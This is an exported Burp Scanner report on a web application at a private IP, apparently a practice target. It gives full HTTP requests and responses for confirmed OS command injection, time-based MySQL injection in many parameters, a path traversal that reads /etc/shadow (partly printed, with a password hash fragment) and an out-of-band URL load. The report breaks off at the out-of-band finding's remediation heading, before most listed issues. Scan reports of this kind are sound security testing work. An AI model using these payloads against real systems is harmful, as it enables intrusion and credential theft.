Burp Scanner Report

Summary

The table below shows the numbers of issues identified in different categories. Issues are classified according to severity as High, Medium, Low or Information. This reflects the likely impact of each issue for a typical organization. Issues are also classified according to confidence as Certain, Firm or Tentative. This reflects the inherent reliability of the technique that was used to identify the issue.

    Confidence
    Certain Firm Tentative Total
Severity High 21 18 0 39
Medium 0 0 0 0
Low 9 0 0 9
Information 63 30 3 96

The chart below shows the aggregated numbers of issues identified in each category. Solid colored bars represent issues with a confidence level of Certain, and the bars fade as the confidence level falls.

    Number of issues
    0 5 10 15 20 25 30 35 40
Severity High
 
Medium
 
Low
 

Contents

1. High severity issues

1.1. OS command injection

1.2. SQL injection

1.3. File path traversal

1.4. Out-of-band resource load (HTTP)

1.5. Cross-site scripting (reflected)

1.6. Cross-origin resource sharing: arbitrary origin trusted

1.7. Cleartext submission of password

1.8. External service interaction (DNS)

1.9. External service interaction (HTTP)

2. Low severity issues

2.1. Password submitted using GET method

2.2. Password field with autocomplete enabled

2.3. Unencrypted communications

3. Informational issues

3.1. Cross-origin resource sharing

3.2. Cross-site request forgery

3.3. X-Forwarded-For dependent response

3.4. User agent-dependent response

3.5. Cross-domain Referer leakage

3.6. Cross-domain script include

3.7. Cookie without HttpOnly flag set

3.8. File upload functionality

3.9. Frameable response (potential Clickjacking)

3.10. Browser cross-site scripting filter disabled

3.11. Private IP addresses disclosed

3.12. Robots.txt file


1. High severity issues
Next
1.1. OS command injection
Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://10.250.200.5:81
Path:   /sys-test.php

Issue detail

The test parameter appears to be vulnerable to OS command injection attacks. It is possible to use the pipe character (|) to inject arbitrary OS commands and retrieve the output in the application's responses.

The payload |echo khvy1hpese bigotxf4l4||a #' |echo khvy1hpese bigotxf4l4||a #|" |echo khvy1hpese bigotxf4l4||a # was submitted in the test parameter. The application's response appears to contain the output from the injected command, indicating that the command was executed.

Issue background

Operating system command injection vulnerabilities arise when an application incorporates user-controllable data into a command that is processed by a shell command interpreter. If the user data is not strictly validated, an attacker can use shell metacharacters to modify the command that is executed, and inject arbitrary further commands that will be executed by the server.

OS command injection vulnerabilities are usually very serious and may lead to compromise of the server hosting the application, or of the application's own data and functionality. It may also be possible to use the server as a platform for attacks against other systems. The exact potential for exploitation depends upon the security context in which the command is executed, and the privileges that this context has regarding sensitive resources on the server.

Issue remediation

If possible, applications should avoid incorporating user-controllable data into operating system commands. In almost every situation, there are safer alternative methods of performing server-level tasks, which cannot be manipulated to perform additional commands than the one intended.

If it is considered unavoidable to incorporate user-supplied data into operating system commands, the following two layers of defense should be used to prevent attacks:

Request

GET /sys-test.php?test=127.0.0.1%2c8.8.8.8%2cgoogle.com|echo%20khvy1hpese%20bigotxf4l4||a%20%23'%20|echo%20khvy1hpese%20bigotxf4l4||a%20%23|"%20|echo%20khvy1hpese%20bigotxf4l4||a%20%23 HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:53:31 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 155
Connection: close
Content-Type: text/html; charset=UTF-8

round-trip min/avg/max/stddev = 0.052/0.052/0.052/0.000 ms</br>round-trip min/avg/max/stddev = 15.061/15.061/15.061/0.000 ms</br>khvy1hpese bigotxf4l4</br>
1.2. SQL injection
Previous  Next

There are 17 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

A wide range of damaging attacks can often be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and taking control of the database server.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterized queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterized queries. It is strongly recommended that you parameterize every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

References



1.2.1. http://10.250.200.5:81/register [username parameter]
Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://10.250.200.5:81
Path:   /register

Issue detail

The username parameter appears to be vulnerable to SQL injection attacks. The payload '+(select*from(select(sleep(20)))a)+' was submitted in the username parameter. The application took 20051 milliseconds to respond to the request, compared with 63 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be MySQL.

Request

POST /register HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/register
Content-Type: multipart/form-data; boundary=--------952112201
Content-Length: 965
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_baf0a32bf708ebfb24022d9545b279af=+; wordpressuser_baf0a32bf708ebfb24022d9545b279af=+; wordpresspass_baf0a32bf708ebfb24022d9545b279af=+; access_level=0

----------952112201
Content-Disposition: form-data; name="password"


----------952112201
Content-Disposition: form-data; name="website"


----------952112201
Content-Disposition: form-data;
...[SNIP]...
ntent-Disposition: form-data; name="pgpid"


----------952112201
Content-Disposition: form-data; name="primaryschool"


----------952112201
Content-Disposition: form-data; name="username"

'+(select*from(select(sleep(20)))a)+'
----------952112201
Content-Disposition: form-data; name="highschool"


----------952112201--

Response

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:53:42 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 2319
Connection: close
Content-Type: text/html; charset=UTF-8

Error: User creation failed<!DOCTYPE html>
<html lang="en">

<head>
   <title></title>
   <meta charset="UTF-8">
   <meta name="viewport" content="width=device-width, initial-scale=1">
   <link href="/css/sty
...[SNIP]...
1.2.2. http://10.250.200.5:81/search [query parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://10.250.200.5:81
Path:   /search

Issue detail

The query parameter appears to be vulnerable to SQL injection attacks. The payload ' and (select*from(select(sleep(20)))a)-- was submitted in the query parameter. The application took 20127 milliseconds to respond to the request, compared with 78 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be MySQL.

Request

POST /search HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/
Content-Type: application/x-www-form-urlencoded
Content-Length: 30
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

query=555-555-0199@example.com'%20and%20(select*from(select(sleep(20)))a)--%20

Response

HTTP/1.1 200 Ok
Date: Wed, 08 Nov 2017 11:48:47 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 2348
Connection: close
Content-Type: text/html; charset=UTF-8

<!doctype html>
<html>

<head>
       <title>555-555-0199@example.com&#039; and (select*from(select(sleep(20)))a)-- - Kafeh khar-feim</title>
   </head>

<body>
   <form action="search" method="GET">
       <h1 st
...[SNIP]...
1.2.3. http://10.250.200.5:81/search [query parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://10.250.200.5:81
Path:   /search

Issue detail

The query parameter appears to be vulnerable to SQL injection attacks. The payload ' and (select*from(select(sleep(20)))a)-- was submitted in the query parameter. The application took 20048 milliseconds to respond to the request, compared with 110 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be MySQL.

Request

GET /search?query=555-555-0199@example.com'%20and%20(select*from(select(sleep(20)))a)--%20 HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/search
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_baf0a32bf708ebfb24022d9545b279af=+; wordpressuser_baf0a32bf708ebfb24022d9545b279af=+; wordpresspass_baf0a32bf708ebfb24022d9545b279af=+; access_level=0

Response

HTTP/1.1 200 Ok
Date: Wed, 08 Nov 2017 11:50:08 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 2348
Connection: close
Content-Type: text/html; charset=UTF-8

<!doctype html>
<html>

<head>
       <title>555-555-0199@example.com&#039; and (select*from(select(sleep(20)))a)-- - Kafeh khar-feim</title>
   </head>

<body>
   <form action="search" method="GET">
       <h1 st
...[SNIP]...
1.2.4. http://10.250.200.5:81/search/search [query parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://10.250.200.5:81
Path:   /search/search

Issue detail

The query parameter appears to be vulnerable to SQL injection attacks. The payload ' and (select*from(select(sleep(20)))a)-- was submitted in the query parameter. The application took 20120 milliseconds to respond to the request, compared with 94 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be MySQL.

Request

GET /search/search?query=555-555-0199@example.com'%20and%20(select*from(select(sleep(20)))a)--%20 HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/search/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_baf0a32bf708ebfb24022d9545b279af=+; wordpressuser_baf0a32bf708ebfb24022d9545b279af=+; wordpresspass_baf0a32bf708ebfb24022d9545b279af=+; access_level=0

Response

HTTP/1.1 200 Ok
Date: Wed, 08 Nov 2017 11:51:39 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 2348
Connection: close
Content-Type: text/html; charset=UTF-8

<!doctype html>
<html>

<head>
       <title>555-555-0199@example.com&#039; and (select*from(select(sleep(20)))a)-- - Kafeh khar-feim</title>
   </head>

<body>
   <form action="search" method="GET">
       <h1 st
...[SNIP]...
1.2.5. http://10.250.200.5:81/sys2_test.php [test parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /sys2_test.php

Issue detail

The test parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the test parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /sys2_test.php?test=' HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:55:18 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 2773
Connection: close
Content-Type: text/html; charset=UTF-8

error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%'' at line 1<!doctype html>
<html pmbx_context="68E2
...[SNIP]...

Request 2

GET /sys2_test.php?test='' HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 2

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:55:18 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 2613
Connection: close
Content-Type: text/html; charset=UTF-8

<!doctype html>
<html pmbx_context="68E2E7E7-626F-494D-87D5-63024AC0F832">

<head>
<title>Kafeh khar-feim</title>
<style type="text/css">
div.absolute {
position: absolute;
...[SNIP]...
1.2.6. http://10.250.200.5:81/user/jyoti.ermine [URL path filename]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://10.250.200.5:81
Path:   /user/jyoti.ermine

Issue detail

The URL path filename appears to be vulnerable to SQL injection attacks. The payload ' and (select*from(select(sleep(20)))a)-- was submitted in the URL path filename. The application timed out when responding to the request, indicating that the injected SQL command caused a time delay.

The database appears to be MySQL.

Request 1

GET /user/jyoti.ermine'%20and%20(select*from(select(sleep(20)))a)--%20 HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

1.2.7. http://10.250.200.5:81/user/jyoti.ermine/ [URL path folder 2]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://10.250.200.5:81
Path:   /user/jyoti.ermine/

Issue detail

The URL path folder 2 appears to be vulnerable to SQL injection attacks. The payload ' and (select*from(select(sleep(20)))a)-- was submitted in the URL path folder 2. The application timed out when responding to the request, indicating that the injected SQL command caused a time delay.

The database appears to be MySQL.

Request 1

GET /user/jyoti.ermine'%20and%20(select*from(select(sleep(20)))a)--%20/ HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

1.2.8. http://10.250.200.5:81/user/marge.aphrodite [URL path filename]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://10.250.200.5:81
Path:   /user/marge.aphrodite

Issue detail

The URL path filename appears to be vulnerable to SQL injection attacks. The payload ' and (select*from(select(sleep(20)))a)-- was submitted in the URL path filename. The application timed out when responding to the request, indicating that the injected SQL command caused a time delay.

The database appears to be MySQL.

Request 1

GET /user/marge.aphrodite'%20and%20(select*from(select(sleep(20)))a)--%20 HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

1.2.9. http://10.250.200.5:81/user/marge.aphrodite [name of an arbitrarily supplied URL parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://10.250.200.5:81
Path:   /user/marge.aphrodite

Issue detail

The name of an arbitrarily supplied URL parameter appears to be vulnerable to SQL injection attacks. The payload (select*from(select(sleep(20)))a) was submitted in the name of an arbitrarily supplied URL parameter. The application timed out when responding to the request, indicating that the injected SQL command caused a time delay.

The database appears to be MySQL.

Request 1

GET /user/marge.aphrodite?1(select*from(select(sleep(20)))a)=1 HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

1.2.10. http://10.250.200.5:81/user/marge.aphrodite/ [URL path folder 2]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://10.250.200.5:81
Path:   /user/marge.aphrodite/

Issue detail

The URL path folder 2 appears to be vulnerable to SQL injection attacks. The payload ' and (select*from(select(sleep(20)))a)-- was submitted in the URL path folder 2. The application timed out when responding to the request, indicating that the injected SQL command caused a time delay.

The database appears to be MySQL.

Request 1

GET /user/marge.aphrodite'%20and%20(select*from(select(sleep(20)))a)--%20/ HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

1.2.11. http://10.250.200.5:81/user/rica.orpah [URL path filename]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://10.250.200.5:81
Path:   /user/rica.orpah

Issue detail

The URL path filename appears to be vulnerable to SQL injection attacks. The payload ' and (select*from(select(sleep(20)))a)-- was submitted in the URL path filename. The application timed out when responding to the request, indicating that the injected SQL command caused a time delay.

The database appears to be MySQL.

Request 1

GET /user/rica.orpah'%20and%20(select*from(select(sleep(20)))a)--%20 HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

1.2.12. http://10.250.200.5:81/user/rica.orpah/ [URL path folder 2]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://10.250.200.5:81
Path:   /user/rica.orpah/

Issue detail

The URL path folder 2 appears to be vulnerable to SQL injection attacks. The payload ' and (select*from(select(sleep(20)))a)-- was submitted in the URL path folder 2. The application timed out when responding to the request, indicating that the injected SQL command caused a time delay.

The database appears to be MySQL.

Request 1

GET /user/rica.orpah'%20and%20(select*from(select(sleep(20)))a)--%20/ HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

1.2.13. http://10.250.200.5:81/user/ricca.gilud [URL path filename]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://10.250.200.5:81
Path:   /user/ricca.gilud

Issue detail

The URL path filename appears to be vulnerable to SQL injection attacks. The payload ' and (select*from(select(sleep(20)))a)-- was submitted in the URL path filename. The application timed out when responding to the request, indicating that the injected SQL command caused a time delay.

The database appears to be MySQL.

Request 1

GET /user/ricca.gilud'%20and%20(select*from(select(sleep(20)))a)--%20 HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

1.2.14. http://10.250.200.5:81/user/ricca.gilud/ [URL path folder 2]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://10.250.200.5:81
Path:   /user/ricca.gilud/

Issue detail

The URL path folder 2 appears to be vulnerable to SQL injection attacks. The payload ' and (select*from(select(sleep(20)))a)-- was submitted in the URL path folder 2. The application timed out when responding to the request, indicating that the injected SQL command caused a time delay.

The database appears to be MySQL.

Request 1

GET /user/ricca.gilud'%20and%20(select*from(select(sleep(20)))a)--%20/ HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

1.2.15. http://10.250.200.5:81/user/stephi.fonda [URL path filename]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://10.250.200.5:81
Path:   /user/stephi.fonda

Issue detail

The URL path filename appears to be vulnerable to SQL injection attacks. The payload ' and (select*from(select(sleep(20)))a)-- was submitted in the URL path filename. The application timed out when responding to the request, indicating that the injected SQL command caused a time delay.

The database appears to be MySQL.

Request 1

GET /user/stephi.fonda'%20and%20(select*from(select(sleep(20)))a)--%20 HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

1.2.16. http://10.250.200.5:81/user/stephi.fonda/ [URL path folder 2]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://10.250.200.5:81
Path:   /user/stephi.fonda/

Issue detail

The URL path folder 2 appears to be vulnerable to SQL injection attacks. The payload ' and (select*from(select(sleep(20)))a)-- was submitted in the URL path folder 2. The application timed out when responding to the request, indicating that the injected SQL command caused a time delay.

The database appears to be MySQL.

Request 1

GET /user/stephi.fonda'%20and%20(select*from(select(sleep(20)))a)--%20/ HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

1.2.17. http://10.250.200.5:81/user/stephi.fonda/me.jpg [User-Agent HTTP header]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://10.250.200.5:81
Path:   /user/stephi.fonda/me.jpg

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. The payload '(select*from(select(sleep(20)))a)' was submitted in the User-Agent HTTP header. The application timed out when responding to the request, indicating that the injected SQL command caused a time delay.

The database appears to be MySQL.

Request 1

GET /user/stephi.fonda/me.jpg HTTP/1.1
Host: 10.250.200.5:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0'(select*from(select(sleep(20)))a)'
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=1
Connection: close

1.3. File path traversal
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://10.250.200.5:81
Path:   /contactus.php

Issue detail

The f parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.

The payload ../../../../../../../../../../../../../../../../etc/shadow was submitted in the f parameter. The requested file was returned in the application's response. Note that disclosure of the shadow file may allow an attacker to discover users' passwords.

Issue background

File path traversal vulnerabilities arise when user-controllable data is used within a filesystem operation in an unsafe manner. Typically, a user-supplied filename is appended to a directory prefix in order to read or write the contents of a file. If vulnerable, an attacker can supply path traversal sequences (using dot-dot-slash characters) to break out of the intended directory and read or write files elsewhere on the filesystem.

This is typically a very serious vulnerability, enabling an attacker to access sensitive files containing configuration data, passwords, database records, log data, source code, and program scripts and binaries.

Issue remediation

Ideally, application functionality should be designed in such a way that user-controllable data does not need to be passed to filesystem operations. This can normally be achieved by referencing known files via an index number rather than their name, and using application-generated filenames to save user-supplied file content.

If it is considered unavoidable to pass user-controllable data to a filesystem operation, three layers of defense can be employed to prevent path traversal attacks:

Request 1

GET /contactus.php?f=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fshadow HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:47:55 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 2383
Connection: close
Content-Type: text/html; charset=UTF-8

<!doctype html>
<html pmbx_context="68E2E7E7-626F-494D-87D5-63024AC0F832">

<head>
<title>Kafeh khar-feim</title>
<style type="text/css">
div.absolute {
position: absolute;
...[SNIP]...
<td>root:*:17448:0:99999:7:::
daemon:*:17448:0:99999:7:::
bin:*:17448:0:99999:7:::
sys:*:17448:0:99999:7:::
sync:*:17448:0:99999:7:::
games:*:17448:0:99999:7:::
man:*:17448:0:99999:7:::
lp:*:17448:0:99999:7:::
mail:*:17448:0:99999:7:::
news:*:17448:0:99999:7:::
uucp:*:17448:0:99999:7:::
proxy:*:17448:0:99999:7:::
www-data:*:17448:0:99999:7:::
backup:*:17448:0:99999:7:::
list:*:17448:0:99999:7:::
irc:*:17448:0:99999:7:::
gnats:*:17448:0:99999:7:::
nobody:*:17448:0:99999:7:::
systemd-timesync:*:17448:0:99999:7:::
systemd-network:*:17448:0:99999:7:::
systemd-resolve:*:17448:0:99999:7:::
systemd-bus-proxy:*:17448:0:99999:7:::
marge.aphrodite:CX1dGnBxH.Yq6
...[SNIP]...
1.4. Out-of-band resource load (HTTP)
Previous  Next

Summary

Severity:   High
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /contactus.php

Issue detail

It is possible to induce the application to retrieve the contents of an arbitrary external URL and return those contents in its own response.

The payload http://a9k2e37z36j226d1tfh328gcv31v3jt7kuaiz.burpcollaborator.net/?contact.txt was submitted in the f parameter.

The application performed an HTTP request to the specified domain. The response from that request was then included in the application's own response.

Issue background

Out-of-band resource load arises when it is possible to induce an application to fetch content from an arbitrary external location, and incorporate that content into the application's own response(s). The ability to trigger arbitrary out-of-band resource load does not constitute a vulnerability in its own right, and in some cases might even be the intended behavior of the application. However, in many cases, it can indicate a vulnerability with serious consequences.

The ability to request and retrieve web content from other systems can allow the application server to be used as a two-way attack proxy. By submitting suitable payloads, an attacker can cause the application server to attack, or retrieve content from, other systems that it can interact with. This may include public third-party systems, internal systems within the same organization, or services available on the local loopback adapter of the application server itself. Depending on the network architecture, this may expose highly vulnerable internal services that are not otherwise accessible to external attackers.

Additionally, the application's processing of web content that is retrieved from arbitrary URLs exposes some important and non-conventional attack surface. An attacker can deploy a web server that returns malicious content, and then induce the application to retrieve and process that content. This processing might give rise to the types of input-based vulnerabilities that are normally found when unexpected input is submitted directly in requests to the application. The out-of-band attack surface that the application exposes should be thoroughly tested for these types of vulnerabilities.

Issue remediation

